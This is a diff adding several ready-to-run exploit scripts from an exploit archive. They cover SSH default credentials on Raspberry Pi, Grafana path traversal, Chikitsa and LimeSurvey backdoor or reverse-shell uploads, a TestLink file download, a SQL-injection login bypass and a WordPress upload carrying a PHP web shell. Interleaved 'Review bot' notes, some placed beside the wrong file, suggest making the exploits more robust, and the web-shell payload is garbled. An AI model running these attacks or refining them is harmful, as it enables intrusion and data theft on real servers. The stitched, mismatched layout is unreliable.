diff --git a/exploits/linux/remote/50576.py b/exploits/linux/remote/50576.py
new file mode 100755
index 000000000..f47a061e0
--- /dev/null
+++ b/exploits/linux/remote/50576.py
@@ -0,0 +1,34 @@
+# Exploit Title: Raspberry Pi 5.10 - Default Credentials
+# Date: 08/12/2021
+# Exploit Author: netspooky
+# Vendor Homepage: https://www.raspberrypi.com/
+# Software Link: https://www.raspberrypi.com/software/operating-systems/
+# Version: Raspberry Pi OS <= 5.10
+# Tested on: Raspberry Pi OS 5.10
+# CVE : CVE-2021-38759
+
+# Initial Release: https://twitter.com/netspooky/status/1468603668266209280
+
+# Run: $ python3 exploit.py IP
+
+import paramiko
+
+import sys
+
+h=sys.argv[1]
+
+u="pi"
+
+p="raspberry"
+
+c=paramiko.client.SSHClient()
+
+c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
+
+c.connect(h,username=u,password=p)
+
+i,o,e=c.exec_command("id")
+
+print(o.read())
+
+c.close()
\ No newline at end of file
diff --git a/exploits/multiple/webapps/50581.py b/exploits/multiple/webapps/50581.py
new file mode 100755
index 000000000..b90a1496e
--- /dev/null
+++ b/exploits/multiple/webapps/50581.py
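Review bot: `c.set_missing_host_key_policy(paramiko.AutoAddPolicy())` accepts whatever host key the peer presents, so the script cannot tell the intended host from an interposed one and will complete the login against either. Load the known-hosts file and reject unknown keys instead: `c.load_system_host_keys()` followed by `c.set_missing_host_key_policy(paramiko.RejectPolicy())`. `h=sys.argv[1]` is read with no length check, so running the script without an argument dies with an IndexError instead of the usage line given in the `# Run:` comment. The final `c.close()` is skipped whenever `connect` or `exec_command` raises; wrapping the connect-to-close sequence in `try`/`finally` keeps the socket from leaking.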
@@ -0,0 +1,104 @@
+# Exploit Title: Grafana 8.3.0 - Directory Traversal and Arbitrary File Read
+# Date: 08/12/2021
+# Exploit Author: s1gh
+# Vendor Homepage: https://grafana.com/
+# Vulnerability Details: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
+# Version: V8.0.0-beta1 through V8.3.0
+# Description: Grafana versions 8.0.0-beta1 through 8.3.0 is vulnerable to directory traversal, allowing access to local files.
+# CVE: CVE-2021-43798
+# Tested on: Debian 10
+# References: https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p47p
+
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+
+import requests
+import argparse
+import sys
+from random import choice
+
+plugin_list = [
+    "alertlist",
+    "annolist",
+    "barchart",
+    "bargauge",
+    "candlestick",
+    "cloudwatch",
+    "dashlist",
+    "elasticsearch",
+    "gauge",
+    "geomap",
+    "gettingstarted",
+    "grafana-azure-monitor-datasource",
+    "graph",
+    "heatmap",
+    "histogram",
+    "influxdb",
+    "jaeger",
+    "logs",
+    "loki",
+    "mssql",
+    "mysql",
+    "news",
+    "nodeGraph",
+    "opentsdb",
+    "piechart",
+    "pluginlist",
+    "postgres",
+    "prometheus",
+    "stackdriver",
+    "stat",
+    "state-timeline",
+    "status-histor",
+    "table",
+    "table-old",
+    "tempo",
+    "testdata",
+    "text",
+    "timeseries",
+    "welcome",
+    "zipkin"
+]
+
+def exploit(args):
+    s = requests.Session()
+    headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.' }
+
+    while True:
+        file_to_read = input('Read file > ')
+
+        try:
+            url = args.host + '/public/plugins/' + choice(plugin_list) + '/../../../../../../../../../../../../..' + file_to_read
+            req = requests.Request(method='GET', url=url, headers=headers)
+            prep = req.prepare()
+            prep.url = url
+            r = s.send(prep, verify=False, timeout=3)
+
+            if 'Plugin file not found' in r.text:
+                print('[-] File not found\n')
+            else:
+                if r.status_code == 200:
+                    print(r.text)
+                else:
+                    print('[-] Something went wrong.')
+                    return
+        except requests.exceptions.ConnectTimeout:
+            print('[-] Request timed out. Please check your host settings.\n')
+            return
+        except Exception:
+            pass
+
+def main():
+    parser = argparse.ArgumentParser(description="Grafana V8.0.0-beta1 - 8.3.0 - Directory Traversal and Arbitrary File Read")
+    parser.add_argument('-H',dest='host',required=True, help="Target host")
+    args = parser.parse_args()
+
+    try:
+        exploit(args)
+    except KeyboardInterrupt:
+        return
+
+
+if __name__ == '__main__':
+    main()
+    sys.exit(0)
\ No newline at end of file
diff --git a/exploits/php/webapps/50571.py b/exploits/php/webapps/50571.py
new file mode 100755
index 000000000..8499c4e64
--- /dev/null
+++ b/exploits/php/webapps/50571.py
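Review bot: The trailing `except Exception: pass` in `exploit` swallows every failure other than the connect timeout — DNS errors, connection refused, a malformed `-H` value — and the loop silently re-prompts as if the request had gone through. Narrow it to `except requests.exceptions.RequestException as exc:` and print `exc` so the operator can see why nothing came back. Every request is also sent with `verify=False` and there is no way to turn certificate validation on; the same unconditional `verify=False` appears in 50571.py and 50572.py, and an `--insecure` flag that defaults to validation is the usual shape. The `#!/usr/bin/env python3` line sits after the header comments, so it is not a shebang (likewise in 50573.py); move it to line 1 or drop it.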
@@ -0,0 +1,64 @@
+# Exploit Title: Chikitsa Patient Management System 2.0.2 - Remote Code Execution (RCE) (Authenticated)
+# Date: 03/12/2021
+# Exploit Author: 0z09e (https://twitter.com/0z09e)
+# Vendor Homepage: https://sourceforge.net/u/dharashah/profile/
+# Software Link: https://sourceforge.net/projects/chikitsa/files/Chikitsa%202.0.2.zip/download
+# Version: 2.0.2
+# Tested on: Ubuntu
+
+import requests
+import os
+import argparse
+
+def login(session , target , username , password):
+    print("[+] Attempting to login with the credential")
+    url = target + "/index.php/login/valid_signin"
+    login_data = {"username" : username , "password" : password}
+    session.post(url , data=login_data , verify=False)
+    return session
+
+def generate_plugin():
+    print("[+] Generating a malicious plugin")
+    global tmp_dir
+    tmp_dir = os.popen("mktemp -d").read().rstrip()
+    open(f"{tmp_dir}/rce.php" , "w").write("")
+    os.popen(f"cd {tmp_dir} && zip rce.zip rce.php").read()
+
+def upload_plugin(session , target):
+    print("[+] Uploading the plugin into the server.")
+    url = target + "/index.php/module/upload_module/"
+    file = open(f"{tmp_dir}/rce.zip" , "rb").read()
+    session.post(url , verify=False ,files = {"extension" : ("rce.zip" , file)})
+    session.get(target + "/index.php/module/activate_module/rce" , verify=False)
+    print(f"[+] Backdoor Deployed at : {target}/application/modules/rce.php")
+    print(f"[+] Example Output : {requests.get(target +'/application/modules/rce.php?cmd=id' , verify=False).text}")
+
+def main():
+    parser = argparse.ArgumentParser("""
+ __ _ __ _ __
+ _____/ /_ (_) /__(_) /__________ _
+ / ___/ __ \/ / //_/ / __/ ___/ __ `/
+/ /__/ / / / / ,< / / /_(__ ) /_/ /
+\___/_/ /_/_/_/|_/_/\__/____/\__,_/
+
+Chikitsa Patient Management System 2.0.2 Authenticated Plugin Upload Remote Code Execution :
+POC Written By - 0z09e (https://twitter.com/0z09e)\n\n""" , formatter_class=argparse.RawTextHelpFormatter)
+    req_args = parser.add_argument_group('required arguments')
+    req_args.add_argument("URL" , help="Target URL. Example : http://10.20.30.40/path/to/chikitsa")
+    req_args.add_argument("-u" , "--username" , help="Username" , required=True)
+    req_args.add_argument("-p" , "--password" , help="password", required=True)
+    args = parser.parse_args()
+
+    target = args.URL
+    if target[-1] == "/":
+        target = target[:-1]
+    username = args.username
+    password = args.password
+
+    session = requests.session()
+    login(session , target , username , password)
+    generate_plugin()
+    upload_plugin(session , target)
+
+if __name__ == "__main__":
+    main()
\ No newline at end of file
diff --git a/exploits/php/webapps/50572.py b/exploits/php/webapps/50572.py
new file mode 100755
index 000000000..ad895e254
--- /dev/null
+++ b/exploits/php/webapps/50572.py
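Review bot: `generate_plugin` obtains its working directory from `os.popen("mktemp -d")` and builds the archive with `os.popen(f"cd {tmp_dir} && zip rce.zip rce.php")`, then hands the path to `upload_plugin` through `global tmp_dir`; the standard library does all of this without spawning a shell — `tempfile.mkdtemp()` for the directory and `zipfile.ZipFile(path, "w")` with `.write()` for the archive — and the directory should be returned from `generate_plugin` and passed to `upload_plugin` as a parameter instead of a module global. The same popen/global pattern is in 50572.py. The `open(...).write("")` and `open(...).read()` calls in `generate_plugin` and `upload_plugin` never close their handles; `with open(...) as fh:` does, and also releases them if the write or read raises.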
@@ -0,0 +1,85 @@
+# Exploit Title: Chikitsa Patient Management System 2.0.2 - 'plugin' Remote Code Execution (RCE) (Authenticated)
+# Date: 03/12/2021
+# Exploit Author: 0z09e (https://twitter.com/0z09e)
+# Vendor Homepage: https://sourceforge.net/u/dharashah/profile/
+# Software Link: https://sourceforge.net/projects/chikitsa/files/Chikitsa%202.0.2.zip/download
+# Version: 2.0.2
+# Tested on: Ubuntu
+
+import requests
+import os
+from zipfile import ZipFile
+import argparse
+
+
+
+
+def login(session , target , username , password):
+    print("[+] Attempting to login with the credential")
+    url = target + "/index.php/login/valid_signin"
+    login_data = {"username" : username , "password" : password}
+    session.post(url , data=login_data , verify=False)
+    return session
+
+
+def download_backup( session , target):
+    print("[+] Downloading the backup (This may take some time)")
+    url = target + "/index.php/settings/take_backup/"
+    backup_req = session.get(url , verify=False)
+    global tmp_dir
+    tmp_dir = os.popen("mktemp -d").read().rstrip()
+    open(tmp_dir + "/backup_raw.zip" , "wb").write(backup_req.content)
+    print(f"[+] Backup downloaded at {tmp_dir}/backup_raw.zip")
+
+
+def modify_backup():
+    print("[+] Modifying the backup by injecting a backdoor.")
+    zf = ZipFile(f'{tmp_dir}/backup_raw.zip', 'r')
+    zf.extractall(tmp_dir)
+    zf.close()
+    open(tmp_dir + "/uploads/media/rce.php" , "w").write("")
+    os.popen(f"cd {tmp_dir}/ && zip -r backup_modified.zip chikitsa-backup.sql prefix.txt uploads/").read()
+
+
+def upload_backup(session , target):
+    print("[+] Uploading the backup back into the server.(This may take some time)")
+    url = target + "/index.php/settings/restore_backup"
+    file = open(f"{tmp_dir}/backup_modified.zip" , "rb").read()
+    session.post(url , verify=False ,files = {"backup" : ("backup-modified.zip" , file)})
+    print(f"[+] Backdoor Deployed at : {target}/uploads/restore_backup/uploads/media/rce.php")
+    print(f"[+] Example Output : {requests.get(target +'/uploads/restore_backup/uploads/media/rce.php?cmd=id' , verify=False).text}")
+
+
+
+
+def main():
+    parser = argparse.ArgumentParser("""
+ __ _ __ _ __
+ _____/ /_ (_) /__(_) /__________ _
+ / ___/ __ \/ / //_/ / __/ ___/ __ `/
+/ /__/ / / / / ,< / / /_(__ ) /_/ /
+\___/_/ /_/_/_/|_/_/\__/____/\__,_/
+
+Chikitsa Patient Management System 2.0.2 Authenticated Remote Code Execution :
+POC Written By - 0z09e (https://twitter.com/0z09e)\n\n""" , formatter_class=argparse.RawTextHelpFormatter)
+    req_args = parser.add_argument_group('required arguments')
+    req_args.add_argument("URL" , help="Target URL. Example : http://10.20.30.40/path/to/chikitsa")
+    req_args.add_argument("-u" , "--username" , help="Username" , required=True)
+    req_args.add_argument("-p" , "--password" , help="password", required=True)
+    args = parser.parse_args()
+
+    target = args.URL
+    if target[-1] == "/":
+        target = target[:-1]
+    username = args.username
+    password = args.password
+
+    session = requests.session()
+    login(session ,target , username , password)
+    download_backup(session , target )
+    modify_backup()
+    upload_backup(session , target)
+
+
+if __name__ == "__main__":
+    main()
\ No newline at end of file
diff --git a/exploits/php/webapps/50573.py b/exploits/php/webapps/50573.py
new file mode 100755
index 000000000..3da71e33b
--- /dev/null
+++ b/exploits/php/webapps/50573.py
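Review bot: `modify_backup` extracts with the already-imported `ZipFile` but rebuilds the archive through `os.popen(f"cd {tmp_dir}/ && zip -r backup_modified.zip ...")`, so the file uses two different mechanisms for the same job; `ZipFile(path, "w")` with one `.write()` per entry keeps it in-process and drops the dependency on an external `zip` binary. The `zf = ZipFile(...)` / `zf.close()` pair should be `with ZipFile(f'{tmp_dir}/backup_raw.zip', 'r') as zf: zf.extractall(tmp_dir)` so the handle is released when `extractall` raises. `download_backup` writes `backup_req.content` straight into `backup_raw.zip` without looking at `backup_req.status_code`, so an HTML error page gets saved as the archive and the failure only surfaces later as a `BadZipFile` from `modify_backup`, pointing at the wrong step; check the status before writing.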
@@ -0,0 +1,111 @@
+# Exploit Title: LimeSurvey 5.2.4 - Remote Code Execution (RCE) (Authenticated)
+# Google Dork: inurl:limesurvey/index.php/admin/authentication/sa/login
+# Date: 05/12/2021
+# Exploit Author: Y1LD1R1M
+# Vendor Homepage: https://www.limesurvey.org/
+# Software Link: https://download.limesurvey.org/latest-stable-release/limesurvey5.2.4+211129.zip
+# Version: 5.2.x
+# Tested on: Kali Linux 2021.3
+# Reference: https://github.com/Y1LD1R1M-1337/Limesurvey-RCE
+
+#!/usr/bin/python
+# -*- coding: utf-8 -*-
+
+
+import requests
+import sys
+import warnings
+from bs4 import BeautifulSoup
+
+warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
+print("_______________LimeSurvey RCE_______________")
+print("")
+print("")
+print("Usage: python exploit.py URL username password port")
+print("Example: python exploit.py http://192.26.26.128 admin password 80")
+print("")
+print("")
+print("== ██╗ ██╗ ██╗██╗ ██████╗ ██╗██████╗ ██╗███╗ ███╗ ==")
+print("== ╚██╗ ██╔╝███║██║ ██╔══██╗███║██╔══██╗███║████╗ ████║ ==")
+print("== ╚████╔╝ ╚██║██║ ██║ ██║╚██║██████╔╝╚██║██╔████╔██║ ==")
+print("== ╚██╔╝ ██║██║ ██║ ██║ ██║██╔══██╗ ██║██║╚██╔╝██║ ==")
+print("== ██║ ██║███████╗██████╔╝ ██║██║ ██║ ██║██║ ╚═╝ ██║ ==")
+print("== ╚═╝ ╚═╝╚══════╝╚═════╝ ╚═╝╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ==")
+print("")
+print("")
+url = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+port = sys.argv[4]
+
+req = requests.session()
+print("[+] Retrieving CSRF token...")
+loginPage = req.get(url+"/index.php/admin/authentication/sa/login")
+response = loginPage.text
+s = BeautifulSoup(response, 'html.parser')
+CSRF_token = s.findAll('input')[0].get("value")
+print(CSRF_token)
+print("[+] Sending Login Request...")
+
+login_creds = {
+    "user": username,
+    "password": password,
+    "authMethod": "Authdb",
+    "loginlang":"default",
+    "action":"login",
+    "width":"1581",
+    "login_submit": "login",
+    "YII_CSRF_TOKEN": CSRF_token
+}
+print("[+]Login Successful")
+print("")
+print("[+] Upload Plugin Request...")
+print("[+] Retrieving CSRF token...")
+filehandle = open("/root/limesurvey/plugin/Y1LD1R1M.zip",mode = "rb") # CHANGE THIS
+login = req.post(url+"/index.php/admin/authentication/sa/login" ,data=login_creds)
+UploadPage = req.get(url+"/index.php/admin/pluginmanager/sa/index")
+response = UploadPage.text
+s = BeautifulSoup(response, 'html.parser')
+CSRF_token2 = s.findAll('input')[0].get("value")
+print(CSRF_token2)
+Upload_creds = {
+    "YII_CSRF_TOKEN":CSRF_token2,
+    "lid":"$lid",
+    "action": "templateupload"
+}
+file_upload= req.post(url+"/index.php/admin/pluginmanager?sa=upload",files = {'the_file':filehandle},data=Upload_creds)
+UploadPage = req.get(url+"/index.php/admin/pluginmanager?sa=uploadConfirm")
+response = UploadPage.text
+print("[+] Plugin Uploaded Successfully")
+print("")
+print("[+] Install Plugin Request...")
+print("[+] Retrieving CSRF token...")
+
+InstallPage = req.get(url+"/index.php/admin/pluginmanager?sa=installUploadedPlugin")
+response = InstallPage.text
+s = BeautifulSoup(response, 'html.parser')
+CSRF_token3 = s.findAll('input')[0].get("value")
+print(CSRF_token3)
+Install_creds = {
+    "YII_CSRF_TOKEN":CSRF_token3,
+    "isUpdate": "false"
+}
+file_install= req.post(url+"/index.php/admin/pluginmanager?sa=installUploadedPlugin",data=Install_creds)
+print("[+] Plugin Installed Successfully")
+print("")
+print("[+] Activate Plugin Request...")
+print("[+] Retrieving CSRF token...")
+ActivatePage = req.get(url+"/index.php/admin/pluginmanager?sa=activate")
+response = ActivatePage.text
+s = BeautifulSoup(response, 'html.parser')
+CSRF_token4 = s.findAll('input')[0].get("value")
+print(CSRF_token4)
+Activate_creds = {
+    "YII_CSRF_TOKEN":CSRF_token4,
+    "pluginId": "1" # CHANGE THIS
+}
+file_activate= req.post(url+"/index.php/admin/pluginmanager?sa=activate",data=Activate_creds)
+print("[+] Plugin Activated Successfully")
+print("")
+print("[+] Reverse Shell Starting, Check Your Connection :)")
+shell= req.get(url+"/upload/plugins/Y1LD1R1M/php-rev.php") # CHANGE THIS
\ No newline at end of file
diff --git a/exploits/php/webapps/50578.txt b/exploits/php/webapps/50578.txt
new file mode 100644
index 000000000..c830c6bd4
--- /dev/null
+++ b/exploits/php/webapps/50578.txt
@@ -0,0 +1,15 @@
+# Exploit Title: TestLink 1.19 - Arbitrary File Download (Unauthenticated)
+# Google Dork: inurl:/testlink/
+# Date: 07/12/2021
+# Exploit Author: Gonzalo Villegas (Cl34r)
+# Exploit Author Homepage: https://nch.ninja
+# Vendor Homepage: https://testlink.org/
+# Version:1.16 <= 1.19
+# CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+
+You can download files from "/lib/attachments/attachmentdownload.php", passing directly in URL the id of file listed on database, otherwise you can iterate the id parameter (from 1)
+
+Vulnerable URL: "http://HOST/lib/attachments/attachmentdownload.php?id=ITERATE_THIS_ID&skipCheck=1"
+
+for research notes:
+https://nch.ninja/blog/unauthorized-file-download-attached-files-testlink-116-119/
\ No newline at end of file
diff --git a/exploits/php/webapps/50579.txt b/exploits/php/webapps/50579.txt
new file mode 100644
index 000000000..58a83e6af
--- /dev/null
+++ b/exploits/php/webapps/50579.txt
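Review bot: `print("[+]Login Successful")` runs before the login POST is even sent (`login = req.post(...)` comes after the `filehandle = open(...)` line), and it and every later `Successfully` message are printed without inspecting the response, so the script reports success whatever the server returned; print those lines only after checking `login.status_code` and the later responses, and fail out otherwise. `port = sys.argv[4]` is parsed but never used, and the four `sys.argv` reads have no length check despite the usage line printed just above them. `filehandle` is opened and never closed — wrap the upload in `with open("/root/limesurvey/plugin/Y1LD1R1M.zip", mode="rb") as filehandle:` — and the values marked `# CHANGE THIS` should be command-line arguments rather than edits to the source.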
@@ -0,0 +1,34 @@
+# Exploit Title: Student Management System 1.0 - SQLi Authentication Bypass
+# Date: 2020-07-06
+# Exploit Author: Enes Özeser
+# Vendor Homepage: https://www.sourcecodester.com/php/14268/student-management-system.html
+# Version: 1.0
+# Tested on: Windows & WampServer
+# CVE: CVE-2020-23935
+
+1- Go to following url. >> http://(HOST)/admin/login.php
+2- We can login succesfully with SQL bypass method.
+
+-- Username = admin'#
+-- Password = (Write Something)
+
+NOTE: Default username and password is admin:admin.
+
+(( HTTP Request ))
+
+POST /process.php HTTP/1.1
+Host: (HOST)
+Connection: keep-alive
+Content-Length: 51
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://(HOST)/
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://(HOST)/index.php?q=login
+Accept-Encoding: gzip, deflate, br
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie: navigate-tinymce-scroll=%7B%7D; navigate-language=en; PHPSESSID=1asdsd3lf9u2d7e82on6rjl
+
+U_USERNAME=admin'#&U_PASS=123123&sidebarLogin=
\ No newline at end of file
diff --git a/exploits/php/webapps/50580.py b/exploits/php/webapps/50580.py
new file mode 100755
index 000000000..2f79b82e3
--- /dev/null
+++ b/exploits/php/webapps/50580.py
@@ -0,0 +1,109 @@
+# Exploit Title: Wordpress Plugin Catch Themes Demo Import 1.6.1 - Remote Code Execution (RCE) (Authenticated)
+# Date 07.12.2021
+# Exploit Author: Ron Jost (Hacker5preme)
+# Vendor Homepage: https://wordpress.org/plugins/catch-themes-demo-import/
+# Software Link: https://downloads.wordpress.org/plugin/catch-themes-demo-import.1.6.1.zip
+# Version: <= 1.6.1
+# Tested on: Ubuntu 18.04
+# CVE: CVE-2021-39352
+# CWE: CWE-434
+# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-39352/README.md
+
+
+'''
+Description:
+The Catch Themes Demo Import WordPress plugin is vulnerable to arbitrary file uploads via the import functionality
+found in the ~/inc/CatchThemesDemoImport.php file, in versions up to 1.7,
+due to insufficient file type validation. This makes it possible for an attacker with administrative privileges to upload
+malicious files that can be used to achieve remote code execution.
+'''
+
+# Banner:
+banner = """
+ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____
+||C |||V |||E |||- |||2 |||0 |||2 |||1 |||- |||3 |||9 |||3 |||5 |||2 ||
+||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__||
+|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|
+
+ [+] Catch Themes Demo Import RCE (Authenticated)
+ [@] Developed by Ron Jost (Hacker5preme)
+
+"""
+print(banner)
+
+
+import argparse
+import requests
+from datetime import datetime
+
+# User-Input:
+my_parser = argparse.ArgumentParser(description='Wordpress Plugin Catch Themes Demo Import - RCE (Authenticated)')
+my_parser.add_argument('-T', '--IP', type=str)
+my_parser.add_argument('-P', '--PORT', type=str)
+my_parser.add_argument('-U', '--PATH', type=str)
+my_parser.add_argument('-u', '--USERNAME', type=str)
+my_parser.add_argument('-p', '--PASSWORD', type=str)
+args = my_parser.parse_args()
+target_ip = args.IP
+target_port = args.PORT
+wp_path = args.PATH
+username = args.USERNAME
+password = args.PASSWORD
+print('')
+print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))
+print('')
+
+# Authentication:
+session = requests.Session()
+auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
+check = session.get(auth_url)
+# Header:
+header = {
+    'Host': target_ip,
+    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
+    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
+    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
+    'Accept-Encoding': 'gzip, deflate',
+    'Content-Type': 'application/x-www-form-urlencoded',
+    'Origin': 'http://' + target_ip,
+    'Connection': 'close',
+    'Upgrade-Insecure-Requests': '1'
+}
+
+# Body:
+body = {
+    'log': username,
+    'pwd': password,
+    'wp-submit': 'Log In',
+    'testcookie': '1'
+}
+auth = session.post(auth_url, headers=header, data=body)
+
+# Get Security nonce value:
+check = session.get('http://' + target_ip + ':' + target_port + wp_path+ 'wp-admin/themes.php?page=catch-themes-demo-import').text
+nonce = check[check.find('ajax_nonce"') + 13:]
+wp_nonce = nonce[:nonce.find('"')]
+print(wp_nonce)
+
+# Exploit:
+exploit_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin-ajax.php'
+
+# Header (Exploit):
+header = {
+    "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0",
+    "Accept": "*/*",
+    "Accept-Language": "de,en-US;q=0.7,en;q=0.3",
+    "Accept-Encoding": "gzip, deflate",
+    'Referer': 'http://' + target_ip + '/wordpress/wp-admin/themes.php?page=catch-themes-demo-import',
+    "X-Requested-With": "XMLHttpRequest",
+    "Content-Type": "multipart/form-data; boundary=---------------------------121585879226594965303252407916",
+    "Origin": "http://" + target_ip,
+    "Connection": "close"
+}
+
+# Exploit Payload (Using p0wny shell: https://github.com/flozz/p0wny-shell):
+shell_payload = 
"-----------------------------121585879226594965303252407916\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nctdi_import_demo_data\r\n-----------------------------121585879226594965303252407916\r\nContent-Disposition: form-data; name=\"security\"\r\n\r\n" + wp_nonce + "\r\n-----------------------------121585879226594965303252407916\r\nContent-Disposition: form-data; name=\"selected\"\r\n\r\nundefined\r\n-----------------------------121585879226594965303252407916\r\nContent-Disposition: form-data; name=\"content_file\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n 
fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?>\n\n\n\n
\n \n\n\n\n ___ ____ _ _ _ _ _ \n _ __ / _ \\__ ___ __ _ _ / __ \\ ___| |__ ___| | |_ /\\/|| || |_ \n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_ .. _|\n| |_) | |_| |\\ V V /| | | | |_| | | (_| \\__ \\ | | | __/ | |_ |_ _|\n| .__/ \\___/ \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_) |_||_| \n|_| |___/ \\____/ \n\n
\n\n\n ___ ____ _ _ _ _ _ \n _ __ / _ \\__ ___ __ _ _ / __ \\ ___| |__ ___| | |_ /\\/|| || |_ \n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_ .. _|\n| |_) | |_| |\\ V V /| | | | |_| | | (_| \\__ \\ | | | __/ | |_ |_ _|\n| .__/ \\___/ \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_) |_||_| \n|_| |___/ \\____/ \n\n
\n\n\n ___ ____ _ _ _ _ _ \n _ __ / _ \\__ ___ __ _ _ / __ \\ ___| |__ ___| | |_ /\\/|| || |_ \n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_ .. _|\n| |_) | |_| |\\ V V /| | | | |_| | | (_| \\__ \\ | | | __/ | |_ |_ _|\n| .__/ \\___/ \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_) |_||_| \n|_| |___/ \\____/ \n\n